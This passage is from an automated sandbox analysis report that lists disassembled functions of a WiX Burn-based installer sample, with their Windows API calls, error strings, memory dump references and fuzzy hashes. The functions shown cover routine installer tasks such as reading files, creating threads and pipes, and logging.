                                                                                                                                                              • Instruction Fuzzy Hash: 7321F672A806247BD63219588C4AFAB367CFF51B70F11011AFF25FB3C1D6AA9C0196E5
                                                                                                                                                              Function 007C6F85 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 227COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 007C6FB2
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 007C71BE
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to read variable included flag., xrefs: 007C71AE
                                                                                                                                                              • Failed to read variable name., xrefs: 007C71A7
                                                                                                                                                              • Failed to read variable literal flag., xrefs: 007C7199
                                                                                                                                                              • Failed to read variable value type., xrefs: 007C71A0
                                                                                                                                                              • Failed to read variable value as number., xrefs: 007C7178
                                                                                                                                                              • Unsupported variable type., xrefs: 007C7184
                                                                                                                                                              • Failed to set variable value., xrefs: 007C7171
                                                                                                                                                              • Failed to read variable count., xrefs: 007C6FD2
                                                                                                                                                              • Failed to read variable value as string., xrefs: 007C718B
                                                                                                                                                              • Failed to set variable., xrefs: 007C7192
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                              • String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
                                                                                                                                                              • API String ID: 3168844106-528957463
                                                                                                                                                              • Opcode ID: c73b2426bd6ca5e6b18824b090df605df662b09af2858091cae0bb307e87e12c
                                                                                                                                                              • Instruction ID: f3b0750efdf6aafbcc92f75c177eb26407447b813e1c2343765fd56e4109f6c3
                                                                                                                                                              • Opcode Fuzzy Hash: c73b2426bd6ca5e6b18824b090df605df662b09af2858091cae0bb307e87e12c
                                                                                                                                                              • Instruction Fuzzy Hash: 4E716C71C0525EEBDF169AA4CC45FAEBBB9EF84710F14412DF910A6290DB389E50DFA0
                                                                                                                                                              Function 008044D1 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 00804550
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00804566
                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 008045BF
                                                                                                                                                              • GetLastError.KERNEL32 ref: 008045C9
                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,?,?,00000001), ref: 0080461D
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00804628
                                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000001), ref: 00804717
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0080478A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorLast$CloseCreateHandlePointerReadSize
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 3286166115-2967768451
                                                                                                                                                              • Opcode ID: 1919d33a95d5cc302592e0d1c61e2db26e00b63ae4848e3e633b2dd7f0adac4c
                                                                                                                                                              • Instruction ID: 756c05a60be7a2b72cb9c7417286d9fb4cbec7301b8ac46f60a8b1b8a8e43d37
                                                                                                                                                              • Opcode Fuzzy Hash: 1919d33a95d5cc302592e0d1c61e2db26e00b63ae4848e3e633b2dd7f0adac4c
                                                                                                                                                              • Instruction Fuzzy Hash: 738125F2A8022AEBEB618E598C45B6B3698FF01724F215129FF15EB2D0E775CD0086D0
                                                                                                                                                              Function 00806D50 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 165COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,74DEDFD0,?,008072C8,?,?), ref: 00806DA6
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00806E11
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00806E89
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00806EC8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$Free$Compare
                                                                                                                                                              • String ID: `<u$label$scheme$term
                                                                                                                                                              • API String ID: 1324494773-4028212031
                                                                                                                                                              • Opcode ID: 413568e6c923936f3a0eac1ed8cc77b9cc14cd472b756560e1de529384b76761
                                                                                                                                                              • Instruction ID: f8b77d627179d5250c421d08b32e2fdb168bf05fc7d51c1e12b704574dd76124
                                                                                                                                                              • Opcode Fuzzy Hash: 413568e6c923936f3a0eac1ed8cc77b9cc14cd472b756560e1de529384b76761
                                                                                                                                                              • Instruction Fuzzy Hash: 34514D35901219EBCB65DB94CC45FAEBBB8FF04721F2442A8E911E72E0E7319E60DB50
                                                                                                                                                              Function 007D4D8D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 122COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • UuidCreate.RPCRT4(?), ref: 007D4DC0
                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000027), ref: 007D4DEF
                                                                                                                                                              • UuidCreate.RPCRT4(?), ref: 007D4E3A
                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000027), ref: 007D4E66
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFromStringUuid
                                                                                                                                                              • String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
                                                                                                                                                              • API String ID: 4041566446-2510341293
                                                                                                                                                              • Opcode ID: 6c38915ebc93363910a729181f0100efad3e53cbe23b7ed31478da54a671bda7
                                                                                                                                                              • Instruction ID: cb507a9227c9e132e30a844e5dad7a293041bb6612f7020c908df6cfcc3e63db
                                                                                                                                                              • Opcode Fuzzy Hash: 6c38915ebc93363910a729181f0100efad3e53cbe23b7ed31478da54a671bda7
                                                                                                                                                              • Instruction Fuzzy Hash: 6E413772A40308ABDB21DAE4C949EDEB7F9BB44710F20412AE905EB340D6799945CBA0
                                                                                                                                                              Function 007DEA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,007C548E,?,?), ref: 007DEA9D
                                                                                                                                                              • GetLastError.KERNEL32(?,007C548E,?,?), ref: 007DEAAA
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,007DE7B4,?,00000000,00000000), ref: 007DEB03
                                                                                                                                                              • GetLastError.KERNEL32(?,007C548E,?,?), ref: 007DEB10
                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,007C548E,?,?), ref: 007DEB4B
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,007C548E,?,?), ref: 007DEB6A
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,007C548E,?,?), ref: 007DEB77
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                              • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                                                                                                              • API String ID: 2351989216-3599963359
                                                                                                                                                              • Opcode ID: d878dcd30251d8a70f75c61d06a202bd8b4df91e39dc0cb595eff3d9ea299e89
                                                                                                                                                              • Instruction ID: d803ff892b39a44dd9f6ef6b84e5feca0e52e84701f92180ddd90e4c8a8c850b
                                                                                                                                                              • Opcode Fuzzy Hash: d878dcd30251d8a70f75c61d06a202bd8b4df91e39dc0cb595eff3d9ea299e89
                                                                                                                                                              • Instruction Fuzzy Hash: 513196B6D01219BBD711AF998D85E9FBABCFF04750F11416AF914FB340E7349E0086A1
                                                                                                                                                              Function 007DE645 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,007C548E,?,?), ref: 007DE666
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007C548E,?,?), ref: 007DE673
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,007DE3C8,00000000,00000000,00000000), ref: 007DE6D2
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007C548E,?,?), ref: 007DE6DF
                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,007C548E,?,?), ref: 007DE71A
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,007C548E,?,?), ref: 007DE72E
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,007C548E,?,?), ref: 007DE73B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                              • String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
                                                                                                                                                              • API String ID: 2351989216-1977201954
                                                                                                                                                              • Opcode ID: 0576653ae6b708e36a32b0971873dadbbf93643cbdb370b35169ff221c9604ff
                                                                                                                                                              • Instruction ID: 692911fa237d1390bab0d2b9e5a18e57f130a31e8993926431318d2f9636949a
                                                                                                                                                              • Opcode Fuzzy Hash: 0576653ae6b708e36a32b0971873dadbbf93643cbdb370b35169ff221c9604ff
                                                                                                                                                              • Instruction Fuzzy Hash: 9B318676D00629BBD7629B99CC05A9FBBF8FF44710F114166FD10FA340E77899008AE1
                                                                                                                                                              Function 007E14E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,007C5405,007C53BD,00000000,007C5445), ref: 007E1506
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007E1519
                                                                                                                                                              • GetExitCodeThread.KERNEL32(0080B488,?), ref: 007E155B
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007E1569
                                                                                                                                                              • ResetEvent.KERNEL32(0080B460), ref: 007E15A4
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007E15AE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                                              • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                                                                                                              • API String ID: 2979751695-3400260300
                                                                                                                                                              • Opcode ID: e6e576d2d640786a12854cbe3a1b07ebda9490fc06fba6052830545d02ca8482
                                                                                                                                                              • Instruction ID: a836057aa9e2b5ff31200bf1528e924aa6e80cb44636c1e254eb3aefac4bcdba
                                                                                                                                                              • Opcode Fuzzy Hash: e6e576d2d640786a12854cbe3a1b07ebda9490fc06fba6052830545d02ca8482
                                                                                                                                                              • Instruction Fuzzy Hash: BD31E871A02245EBD7109F668D06BBF7BFCFF48710B50406AF916DA260E738CA509B61
                                                                                                                                                              Function 007E15FE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82synchronizationCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetEvent.KERNEL32(0080B478,?,00000000,?,007CC1D3,?,007C53BD,00000000,?,007D784D,?,007C566D,007C5479,007C5479,00000000,?), ref: 007E161B
                                                                                                                                                              • GetLastError.KERNEL32(?,007CC1D3,?,007C53BD,00000000,?,007D784D,?,007C566D,007C5479,007C5479,00000000,?,007C5489,FFF9E89D,007C5489), ref: 007E1625
                                                                                                                                                              • WaitForSingleObject.KERNEL32(0080B488,000000FF,?,007CC1D3,?,007C53BD,00000000,?,007D784D,?,007C566D,007C5479,007C5479,00000000,?,007C5489), ref: 007E165F
                                                                                                                                                              • GetLastError.KERNEL32(?,007CC1D3,?,007C53BD,00000000,?,007D784D,?,007C566D,007C5479,007C5479,00000000,?,007C5489,FFF9E89D,007C5489), ref: 007E1669
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,007C5489,?,00000000,?,007CC1D3,?,007C53BD,00000000,?,007D784D,?,007C566D,007C5479,007C5479,00000000), ref: 007E16B4
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,007C5489,?,00000000,?,007CC1D3,?,007C53BD,00000000,?,007D784D,?,007C566D,007C5479,007C5479,00000000), ref: 007E16C3
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,007C5489,?,00000000,?,007CC1D3,?,007C53BD,00000000,?,007D784D,?,007C566D,007C5479,007C5479,00000000), ref: 007E16D2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle$ErrorLast$EventObjectSingleWait
                                                                                                                                                              • String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
                                                                                                                                                              • API String ID: 1206859064-226982402
                                                                                                                                                              • Opcode ID: ece5351eec2c4244dfa3f779d031295e63e5eb0077b129c711c28a510c7debdd
                                                                                                                                                              • Instruction ID: b02ebc19baffc489394877ebc6e13cf8d34210c619262c3e08e02e5289fbd2fc
                                                                                                                                                              • Opcode Fuzzy Hash: ece5351eec2c4244dfa3f779d031295e63e5eb0077b129c711c28a510c7debdd
                                                                                                                                                              • Instruction Fuzzy Hash: 8F212933502A22F7C7215B56CC0AB56B7A4FF0C721F550225F914A5EA0DB7DEC60CAD9
                                                                                                                                                              Function 007D41EC Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 55COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00800523: EnterCriticalSection.KERNEL32(0082B5FC,00000000,?,?,?,007D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,007C54FA,?), ref: 00800533
                                                                                                                                                                • Part of subcall function 00800523: LeaveCriticalSection.KERNEL32(0082B5FC,?,?,0082B5F4,?,007D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,007C54FA,?), ref: 0080067A
                                                                                                                                                              • OpenEventLogW.ADVAPI32(00000000,Application), ref: 007D4212
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 007D421E
                                                                                                                                                              • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,008139D4,00000000), ref: 007D426B
                                                                                                                                                              • CloseEventLog.ADVAPI32(00000000), ref: 007D4272
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                                                                                                                              • String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
                                                                                                                                                              • API String ID: 1844635321-1389066741
                                                                                                                                                              • Opcode ID: 32b35afd8781b8063ff9c0f9d4643c7c351b3beabc445e6d917abc269d3ca7ee
                                                                                                                                                              • Instruction ID: 504fed0f5efe079af96ef0c4ee75615ac07865f9bf6e99552958c302af11f33f
                                                                                                                                                              • Opcode Fuzzy Hash: 32b35afd8781b8063ff9c0f9d4643c7c351b3beabc445e6d917abc269d3ca7ee
                                                                                                                                                              • Instruction Fuzzy Hash: 20F0D132A85A717AD63122A65C0EEBB1C7CFE82F317010019BC60F1380EB5C998185F5
                                                                                                                                                              Function 007D93FE Relevance: 16.7, APIs: 2, Strings: 9, Instructions: 226COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 007D949E
                                                                                                                                                              • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 007D94C6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                              • String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
                                                                                                                                                              • API String ID: 1452528299-4263581490
                                                                                                                                                              • Opcode ID: 8c850408e619395749829095272f448ca69f1d0dfac8bfac836fbcd909e29233
                                                                                                                                                              • Instruction ID: 7f004fc031acfee1cb71d21eb558a77f0dc74823832d47e8c69863af5ddc7e20
                                                                                                                                                              • Opcode Fuzzy Hash: 8c850408e619395749829095272f448ca69f1d0dfac8bfac836fbcd909e29233
                                                                                                                                                              • Instruction Fuzzy Hash: D5714172D01229ABDB11DF94C845FEEB7B8BF08720F15412AEA15F7391E73999418BA0
                                                                                                                                                              Function 007DE56C Relevance: 16.6, APIs: 11, Instructions: 86windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 007DE577
                                                                                                                                                              • DefWindowProcW.USER32(?,00000082,?,?), ref: 007DE5B5
                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,00000000), ref: 007DE5C2
                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 007DE5D1
                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 007DE5DF
                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 007DE5EB
                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 007DE5FC
                                                                                                                                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 007DE61E
                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 007DE626
                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 007DE629
                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 007DE637
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 409979828-0
                                                                                                                                                              • Opcode ID: fa04778fdf2e208714cda393782ddf639e29c43721bbb80220fe4ba4ba12e244
                                                                                                                                                              • Instruction ID: 79e9336a6914474d69e809750d4502cc15bd79d23b922e70cffd7cc59cd2e4f3
                                                                                                                                                              • Opcode Fuzzy Hash: fa04778fdf2e208714cda393782ddf639e29c43721bbb80220fe4ba4ba12e244
                                                                                                                                                              • Instruction Fuzzy Hash: 1B218932100204BFDB566F68EC0CD7B3FB8FF49360B164519F6169A2B0D7359810DB60
                                                                                                                                                              Function 007DA13A Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 222COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • WixBundleLastUsedSource, xrefs: 007DA1A1
                                                                                                                                                              • Failed to get bundle layout directory property., xrefs: 007DA287
                                                                                                                                                              • WixBundleOriginalSource, xrefs: 007DA1B7
                                                                                                                                                              • Failed to copy source path., xrefs: 007DA31A
                                                                                                                                                              • Failed to combine last source with source., xrefs: 007DA210
                                                                                                                                                              • Failed to combine layout source with source., xrefs: 007DA2A4
                                                                                                                                                              • WixBundleLayoutDirectory, xrefs: 007DA26C
                                                                                                                                                              • Failed to get current process directory., xrefs: 007DA1F3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Find$CloseFileFirstlstrlen
                                                                                                                                                              • String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
                                                                                                                                                              • API String ID: 2767606509-3003062821
